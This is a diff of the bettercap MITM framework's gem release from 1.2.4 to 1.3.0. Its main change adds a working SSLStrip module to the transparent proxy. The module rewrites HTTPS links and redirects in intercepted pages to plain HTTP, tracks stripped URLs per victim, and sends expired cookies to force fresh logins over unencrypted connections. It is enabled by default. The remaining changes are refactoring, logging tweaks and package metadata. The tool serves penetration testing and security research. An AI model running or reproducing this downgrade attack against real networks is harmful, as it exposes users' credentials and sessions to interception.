bettercap 1.2.4 → 1.3.0

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: d277978f66ed5f5cd7f82b8fb071c5869c1f6c4b
-  data.tar.gz: ff6e06d690813d5898c0ba8f20564604b185ee96
+  metadata.gz: 6670a29441233971065df36cbeb7acba16762072
+  data.tar.gz: cc8daa2e7840ddc71b3d5925d114be71b219aba9
 SHA512:
-  metadata.gz: 4ac7c66a0e57e773cfd69d448e3f558588f5816267b1d6fd2513a2b1696a124ad1d2886b880be4ef5116f0c042d9ef182c71f04e6d5081f20ec08df8b75892e6
-  data.tar.gz: b4580bc7a43f897d592ba531dedda3d71230f669d22737b81785a94cfb815eaebb568eb57aca89c66b09cde476165702f299cf53bba146e1e54cf6c79d79db2a
+  metadata.gz: 4a280f7c72b0ae33f3d82614657c927c1d24f11fb828df64e954f60021ed7a87c623ec939dc8715f542510d5268f2413325627d38e56a0c5831774aa90e95931
+  data.tar.gz: 5cb2e4adada12bcb02a70b73a07477063423bc0ed9a96ec510de132a00b904152839a2cc8682f6c47b221425880c89d22874a4937c215ee06347b920047178fd

data/README.md

@@ -83,9 +83,9 @@ Dependencies
 All dependencies will be automatically installed through the GEM system, in some case you might need to install some system
 dependency in order to make everything work:
 
-    sudo apt-get install ruby-dev libpcap-dev
+    sudo apt-get install build-essential ruby-dev libpcap-dev
 
-This should solve issues such as [this one](https://github.com/evilsocket/bettercap/issues/22).
+This should solve issues such as [this one](https://github.com/evilsocket/bettercap/issues/22) or [this one](https://github.com/evilsocket/bettercap/issues/100).
 
 Documentation and Examples
 ============

data/lib/bettercap.rb

@@ -51,6 +51,9 @@ require 'bettercap/proxy/stream_logger'
 require 'bettercap/proxy/request'
 require 'bettercap/proxy/response'
 require 'bettercap/proxy/thread_pool'
+require 'bettercap/proxy/sslstrip/cookiemonitor'
+require 'bettercap/proxy/sslstrip/urlmonitor'
+require 'bettercap/proxy/sslstrip/strip'
 require 'bettercap/proxy/proxy'
 require 'bettercap/proxy/streamer'
 require 'bettercap/proxy/module'

data/lib/bettercap/context.rb

@@ -134,7 +134,7 @@ class Context
 
     @proxy_processor = Proc.new do |request,response|
       if Proxy::Module.modules.empty?
-        Logger.warn 'WARNING: No proxy module loaded, skipping request.'
+        Logger.debug 'WARNING: No proxy module loaded, skipping request.'
       else
         # loop each loaded module and execute if enabled
         Proxy::Module.modules.each do |mod|
@@ -183,8 +183,6 @@ class Context
     # Logger is silent if @running == false
     puts "\nShutting down, hang on ...\n"
 
-    @packets.stop
-
     Logger.debug 'Stopping target discovery manager ...'
     @discovery.stop
 
@@ -193,6 +191,10 @@ class Context
       spoofer.stop
     end
 
+    # Spoofer might be sending some last packets to restore the targets,
+    # the packet queue must be stopped here.
+    @packets.stop
+
     Logger.debug 'Stopping proxies ...'
     @proxies.each do |proxy|
       proxy.stop

data/lib/bettercap/network/packet_queue.rb

@@ -45,6 +45,7 @@ class PacketQueue
 
   # Notify the queue to stop and wait for every worker to finish.
   def stop
+    wait_empty( 60 )
     @running = false
     @nworkers.times { push(nil) }
     @workers.map(&:join)

data/lib/bettercap/options.rb

@@ -66,6 +66,8 @@ class Options
   attr_accessor :proxy_pem_file
   # File name of the transparent proxy module to load.
   attr_accessor :proxy_module
+  # If true, sslstrip is enabled.
+  attr_accessor :sslstrip
   # Custom HTTP transparent proxy address.
   attr_accessor :custom_proxy
   # Custom HTTP transparent proxy port.
@@ -129,6 +131,8 @@ class Options
     @custom_https_proxy = nil
     @custom_https_proxy_port = 8083
 
+    @sslstrip = true
+
     @httpd = false
     @httpd_port = 8081
     @httpd_path = './'
@@ -278,6 +282,10 @@ class Options
         ctx.options.custom_proxy_port = v.to_i
       end
 
+      opts.on( '--no-sslstrip', 'Disable SSLStrip.' ) do
+        ctx.options.sslstrip = false
+      end
+
       opts.on( '--custom-https-proxy ADDRESS', 'Use a custom HTTPS upstream proxy instead of the builtin one.' ) do |v|
         ctx.options.custom_https_proxy = v
       end
@@ -520,6 +528,7 @@ class Options
       'sniffer'     => if sniffer then on else off end,
       'http-proxy'  => if proxy then on else off end,
       'https-proxy' => if proxy_https then on else off end,
+      'sslstrip'    => if proxy and sslstrip then on else off end,
       'http-server' => if httpd then on else off end,
     }
 

data/lib/bettercap/proxy/module.rb

@@ -85,12 +85,15 @@ class Module
   # Loop each available BetterCap::Proxy::Proxy module and yield each
   # one of them for the given code block.
   def self.each_module
-    Object.constants.each do |klass|
-      const = Kernel.const_get(klass.to_s)
-      if const.respond_to?(:superclass) and const.superclass == self
-        yield const
+      old_verbose, $VERBOSE = $VERBOSE, nil
+      Object.constants.each do |klass|
+        const = Kernel.const_get(klass.to_s)
+        if const.respond_to?(:superclass) and const.superclass == self
+          yield const
+        end
       end
-    end
+    ensure
+      $VERBOSE = old_verbose
   end
 end
 end

data/lib/bettercap/proxy/proxy.rb

@@ -122,10 +122,10 @@ class Proxy
 
       # someone is having fun with us =)
       if is_self_request? request
-        @streamer.rickroll client, @is_https
+        @streamer.rickroll( client, @is_https )
       # handle request
       else
-        @streamer.handle( request, client, @is_https )
+        @streamer.handle( request, client )
       end
 
       Logger.debug "#{@type} client served."

data/lib/bettercap/proxy/request.rb

@@ -23,13 +23,17 @@ class Request
   # Hostname.
   attr_reader :host
   # Request port.
-  attr_reader :port
+  attr_accessor :port
   # Request headers hash.
   attr_reader :headers
   # Content length.
   attr_reader :content_length
   # Request body.
   attr_reader :body
+  # Client address.
+  attr_accessor :client
+  # Client port.
+  attr_accessor :client_port
 
   # Initialize this object setting #port to +default_port+.
   def initialize( default_port = 80 )
@@ -41,6 +45,8 @@ class Request
     @headers = {}
     @content_length = 0
     @body   = nil
+    @client = ""
+    @client_port = 0
   end
 
   # Read lines from the +sock+ socket and parse them.
@@ -121,6 +127,29 @@ class Request
   def to_s
     @lines.join("\n") + "\n" + ( @body || '' )
   end
+
+  def to_url(max_length = 50)
+    schema = if port == 443 then 'https' else 'http' end
+    url = "#{schema}://#{@host}#{@url}"
+    url = url.slice(0..max_length) + '...' unless url.length <= max_length
+    url
+  end
+
+  # Return the value of header with +name+ or an empty string.
+  def [](name)
+    if @headers.include?(name) then @headers[name] else "" end
+  end
+
+  # If the header with +name+ is found, then a +value+ is assigned to it.
+  def []=(name, value)
+    @lines.each_with_index do |line,i|
+      if line =~ /^#{name}:\s*.+$/i
+        @headers[name] = value
+        @lines[i] = "#{name}: #{value}"
+        break
+      end
+    end
+  end
 end
 end
 end

data/lib/bettercap/proxy/response.rb

@@ -47,7 +47,7 @@ class Response
   def convert_webrick_response!(response)
     self << "HTTP/#{response.http_version} #{response.code} #{response.msg}"
     response.each do |key,value|
-      self << "#{key}: #{value}"
+      self << "#{key.gsub(/\bwww|^te$|\b\w/){ $&.upcase }}: #{value}"
     end
     self << "\n"
     @code = response.code
@@ -97,6 +97,26 @@ class Response
     @content_type and ( @content_type =~ /^text\/.+/ or @content_type =~ /^application\/.+/ )
   end
 
+  # Return the value of header with +name+ or an empty string.
+  def [](name)
+    @headers.each do |header|
+      if header =~ /^#{name}:\s*(.+)$/i
+        return $1
+      end
+    end
+    ""
+  end
+
+  # If the header with +name+ is found, then a +value+ is assigned to it.
+  def []=(name, value)
+    @headers.each_with_index do |header,i|
+      if header =~ /^#{name}:\s*.+$/i
+        @headers[i] = "#{name}: #{value}"
+        break
+      end
+    end
+  end
+
   # Return a string representation of this response object, patching the
   # Content-Length header if the #body was modified.
   def to_s

data/lib/bettercap/proxy/sslstrip/cookiemonitor.rb

@@ -0,0 +1,60 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Proxy
+module SSLStrip
+
+# Class to handle a cookies for sslstrip.
+class CookieMonitor
+  # Create an instance of this object.
+  def initialize
+    @set = []
+  end
+
+  # Return true if the +request+ was already cleaned.
+  def is_clean?(request)
+    if request.post?
+      return true
+    elsif request['Cookie'].empty?
+      return true
+    else
+      return @set.include?( [request.client, get_domain(request)] )
+    end
+  end
+
+  # Build cookie expiration headers for the +request+ and add its domain
+  # to our list.
+  def get_expired_headers!(request)
+    domain = get_domain(request)
+    @set << [request.client, domain]
+
+    expired = []
+    request['Cookie'].split(';').each do |cookie|
+      cname = cookie.split("=")[0].strip
+      expired << "#{cname}=EXPIRED; path=/; domain=#{domain}; Expires=Mon, 01-Jan-1990 00:00:00 GMT"
+      expired << "#{cname}=EXPIRED; path=/; domain=#{request.host}; Expires=Mon, 01-Jan-1990 00:00:00 GMT"
+    end
+
+    expired
+  end
+
+  # Return the cookie domain given the +request+ object.
+  def get_domain(request)
+    parts = request.host.split('.')
+    ".#{parts[-2]}.#{parts[-1]}"
+  end
+end
+
+end
+end
+end

data/lib/bettercap/proxy/sslstrip/strip.rb

@@ -0,0 +1,116 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Proxy
+module SSLStrip
+
+# Handle SSL stripping.
+class Strip
+  # Maximum number of redirects to detect a HTTPS redirect loop.
+  MAX_REDIRECTS = 3
+  # Regular expression used to parse HTTPS urls.
+  HTTPS_URL_RE = /(https:\/\/[^"'\/]+)/i
+
+  # Create an instance of this object.
+  def initialize
+    @urls    = URLMonitor.new
+    @cookies = CookieMonitor.new
+  end
+
+  # Check if the +request+ is a result of a stripped link/redirect and handle
+  # cookies cleaning.
+  # Return a response object or nil if the request must be performed.
+  def preprocess( request )
+    # check for cookies.
+    unless @cookies.is_clean?(request)
+      Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Sending expired cookies for '#{request.host}'."
+      expired = @cookies.get_expired_headers!(request)
+
+      return build_expired_cookies( expired, request )
+    end
+
+    # check for stripped urls.
+    link = @urls.normalize( request.host )
+    if request.port == 80 and @urls.was_stripped?( request.client, link )
+      Logger.debug "[#{'SSLSTRIP'.green} #{request.client}] Found stripped HTTPS link '#{link}', proxying via SSL."
+      request.port = 443
+    end
+
+    nil
+  end
+
+  # Process the +request+ and if it's a redirect to a HTTPS url patch the
+  # Location header and retry.
+  # Process the +response+ and replace every https link in its body with
+  # http counterparts.
+  def process( request, response )
+    # check for a redirect
+    if response['Location'].start_with?('https://')
+      link = @urls.normalize( response['Location'] )
+      Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Found redirect to HTTPS '#{link}'."
+      @urls.add!( request.client, link )
+
+      # The request will be retried on port 443 if MAX_REDIRECTS is not reached.
+      request.port = 443
+      # If MAX_REDIRECTS is reached, the 'Location' header will be used.
+      response['Location'] = @urls.downgrade( response['Location'] )
+
+      # retry the request if possible
+      return true
+    end
+
+    # parse body
+    links = []
+    response.body.scan( HTTPS_URL_RE ).uniq.each do |link|
+      if link[0].include?('.')
+        link       = @urls.normalize( link[0] )
+        downgraded = @urls.downgrade( link )
+
+        links << [link, downgraded]
+      end
+    end
+
+    unless links.empty?
+      Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Stripping #{links.size} HTTPS link#{if links.size > 1 then 's' else '' end} inside '#{request.to_url}'."
+
+      links.each do |l|
+        link, downgraded = l
+        @urls.add!( request.client, link )
+        response.body.gsub!( link, downgraded )
+      end
+    end
+
+    # do not retry the request.
+    false
+  end
+
+  private
+
+  def build_expired_cookies( expired, request )
+    resp = Response.new
+
+    resp << "HTTP/1.1 302 Moved"
+    resp << "Connection: close"
+    resp << "Location: http://#{request.host}#{request.url}"
+
+    expired.each do |cookie|
+      resp << "Set-Cookie: #{cookie}"
+    end
+
+    resp
+  end
+end
+
+end
+end
+end

data/lib/bettercap/proxy/sslstrip/urlmonitor.rb

@@ -0,0 +1,52 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Proxy
+module SSLStrip
+
+# Class to handle a list of ( client, url ) objects.
+class URLMonitor
+  # Create an instance of this object.
+  def initialize
+    @urls = []
+  end
+
+  # Return true if the object (client, url) is found inside this list.
+  def was_stripped?( client, url )
+    @urls.include?([client, url])
+  end
+ 
+  # Add the object (client, url) to this list.
+  def add!( client, url )
+    unless was_stripped?(client, url)
+      @urls << [client, url]
+    end
+  end
+
+  # Return a normalized version of +url+.
+  def normalize( url )
+    url = if url.include?('://') then url else "https://#{url}" end
+    url = if url.end_with?('/') then url else "#{url}/" end
+    url
+  end
+
+  # Downgrade +url+ from HTTPS to HTTP.
+  # Will take care of HSTS bypass urls in a near future.
+  def downgrade( url )
+    url.gsub( 'https://', 'http://' )
+  end
+end
+
+end
+end
+end

data/lib/bettercap/proxy/stream_logger.rb

@@ -46,7 +46,8 @@ class StreamLogger
 
   # Log a HTTP ( HTTPS if +is_https+ is true ) stream performed by the +client+
   # with the +request+ and +response+ most important informations.
-  def self.log_http( is_https, client, request, response )
+  def self.log_http( request, response )
+    is_https   = request.port == 443
     request_s  = "#{is_https ? 'https' : 'http'}://#{request.host}#{request.url}"
     response_s = "( #{response.content_type} )"
     request_s  = request_s.slice(0..@@MAX_REQ_SIZE) + '...' unless request_s.length <= @@MAX_REQ_SIZE
@@ -58,7 +59,7 @@ class StreamLogger
       response_s += " [#{response.code}]"
     end
 
-    Logger.raw "[#{self.addr2s(client)}] #{request.verb.light_blue} #{request_s} #{response_s}"
+    Logger.raw "[#{self.addr2s(request.client)}] #{request.verb.light_blue} #{request_s} #{response_s}"
   end
 end
 end

data/lib/bettercap/proxy/streamer.rb

@@ -18,6 +18,8 @@ class Streamer
   # Initialize the class with the given +processor+ routine.
   def initialize( processor )
     @processor = processor
+    @ctx       = Context.get
+    @sslstrip  = SSLStrip::Strip.new
   end
 
   # Redirect the +client+ to a funny video.
@@ -30,28 +32,51 @@ class Streamer
     client.write "Location: https://www.youtube.com/watch?v=dQw4w9WgXcQ\n\n"
   end
 
-  # Handle the HTTP +request+ from +client+, if +is_https+ is true it will be
-  # forwarded as a HTTPS request.
-  def handle( request, client, is_https )
+  # Handle the HTTP +request+ from +client+.
+  def handle( request, client, redirects = 0 )
     response = Response.new
-    client_ip, client_port = get_client_details( is_https, client )
+    is_https = request.port == 443
+    request.client, request.client_port = get_client_details( is_https, client )
 
-    Logger.debug "Handling #{request.verb} request from #{client_ip}:#{client_port} ..."
+    Logger.debug "Handling #{request.verb} request from #{request.client}:#{request.client_port} ..."
 
     begin
-      self.send( "do_#{request.verb}", request, response )
+      r = nil
+      if @ctx.options.sslstrip
+        r = @sslstrip.preprocess( request )
+      end
+
+      if r.nil?
+        self.send( "do_#{request.verb}", request, response )
+      else
+        response = r
+      end
 
       if response.textual?
-        StreamLogger.log_http( is_https, client_ip, request, response )
+        StreamLogger.log_http( request, response )
       else
-        Logger.debug "[#{client_ip}] -> #{request.host}#{request.url} [#{response.code}]"
+        Logger.debug "[#{request.client}] -> #{request.host}#{request.url} [#{response.code}]"
+      end
+
+      if @ctx.options.sslstrip
+        # do we need to retry the request?
+        if @sslstrip.process( request, response ) == true
+          # https redirect loop?
+          if redirects < SSLStrip::Strip::MAX_REDIRECTS
+            return self.handle( request, client, redirects + 1 )
+          else
+            Logger.info "[#{'SSLSTRIP'.yellow} #{request.client}] Detected HTTPS redirect loop for '#{request.host}'."
+          end
+        end
       end
 
       @processor.call( request, response )
 
       client.write response.to_s
-    rescue NoMethodError
-      Logger.warn "Could not handle #{request.verb} request from #{client_ip}:#{client_port} ..."
+    rescue NoMethodError => e
+      Logger.warn "Could not handle #{request.verb} request from #{request.client}:#{request.client_port} ..."
+      Logger.debug e.inspect
+      Logger.debug e.backtrace.join("\n")
     end
   end
 

data/lib/bettercap/version.rb

@@ -11,7 +11,7 @@ This project is released under the GPL 3 license.
 =end
 module BetterCap
   # Current version of bettercap.
-  VERSION = '1.2.4'
+  VERSION = '1.3.0'
   # Program banner.
   BANNER = File.read( File.dirname(__FILE__) + '/banner' ).gsub( '#VERSION#', "v#{VERSION}")
 end

metadata

@@ -1,83 +1,83 @@
 --- !ruby/object:Gem::Specification
 name: bettercap
 version: !ruby/object:Gem::Version
-  version: 1.2.4
+  version: 1.3.0
 platform: ruby
 authors:
 - Simone Margaritelli
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2016-01-21 00:00:00.000000000 Z
+date: 2016-01-24 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize
   requirement: !ruby/object:Gem::Requirement
     requirements:
-    - - ~>
+    - - "~>"
       - !ruby/object:Gem::Version
         version: 0.7.5
   type: :runtime
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
     requirements:
-    - - ~>
+    - - "~>"
       - !ruby/object:Gem::Version
         version: 0.7.5
 - !ruby/object:Gem::Dependency
   name: packetfu
   requirement: !ruby/object:Gem::Requirement
     requirements:
-    - - ~>
+    - - "~>"
       - !ruby/object:Gem::Version
         version: 1.1.10
   type: :runtime
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
     requirements:
-    - - ~>
+    - - "~>"
       - !ruby/object:Gem::Version
         version: 1.1.10
 - !ruby/object:Gem::Dependency
   name: pcaprub
   requirement: !ruby/object:Gem::Requirement
     requirements:
-    - - ~>
+    - - "~>"
       - !ruby/object:Gem::Version
         version: 0.12.0
   type: :runtime
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
     requirements:
-    - - ~>
+    - - "~>"
       - !ruby/object:Gem::Version
         version: 0.12.0
 - !ruby/object:Gem::Dependency
   name: network_interface
   requirement: !ruby/object:Gem::Requirement
     requirements:
-    - - ~>
+    - - "~>"
       - !ruby/object:Gem::Version
         version: 0.0.1
   type: :runtime
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
     requirements:
-    - - ~>
+    - - "~>"
       - !ruby/object:Gem::Version
         version: 0.0.1
 - !ruby/object:Gem::Dependency
   name: net-dns
   requirement: !ruby/object:Gem::Requirement
     requirements:
-    - - ~>
+    - - "~>"
       - !ruby/object:Gem::Version
         version: 0.8.0
   type: :runtime
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
     requirements:
-    - - ~>
+    - - "~>"
       - !ruby/object:Gem::Version
         version: 0.8.0
 description: A complete, modular, portable and easily extensible MITM framework.
@@ -90,6 +90,8 @@ files:
 - CONTRIBUTING.md
 - LICENSE.md
 - README.md
+- bin/bettercap
+- lib/bettercap.rb
 - lib/bettercap/banner
 - lib/bettercap/context.rb
 - lib/bettercap/discovery/agents/arp.rb
@@ -123,6 +125,9 @@ files:
 - lib/bettercap/proxy/proxy.rb
 - lib/bettercap/proxy/request.rb
 - lib/bettercap/proxy/response.rb
+- lib/bettercap/proxy/sslstrip/cookiemonitor.rb
+- lib/bettercap/proxy/sslstrip/strip.rb
+- lib/bettercap/proxy/sslstrip/urlmonitor.rb
 - lib/bettercap/proxy/stream_logger.rb
 - lib/bettercap/proxy/streamer.rb
 - lib/bettercap/proxy/thread_pool.rb
@@ -145,32 +150,29 @@ files:
 - lib/bettercap/spoofers/none.rb
 - lib/bettercap/update_checker.rb
 - lib/bettercap/version.rb
-- lib/bettercap.rb
-- bin/bettercap
 homepage: http://github.com/evilsocket/bettercap
 licenses:
 - GPL3
 metadata: {}
 post_install_message: 
 rdoc_options:
-- --charset=UTF-8
+- "--charset=UTF-8"
 require_paths:
 - lib
 required_ruby_version: !ruby/object:Gem::Requirement
   requirements:
-  - - '>='
+  - - ">="
     - !ruby/object:Gem::Version
       version: '1.9'
 required_rubygems_version: !ruby/object:Gem::Requirement
   requirements:
-  - - '>='
+  - - ">="
     - !ruby/object:Gem::Version
       version: '0'
 requirements: []
 rubyforge_project: 
-rubygems_version: 2.0.14
+rubygems_version: 2.5.1
 signing_key: 
 specification_version: 4
 summary: A complete, modular, portable and easily extensible MITM framework.
 test_files: []
-has_rdoc: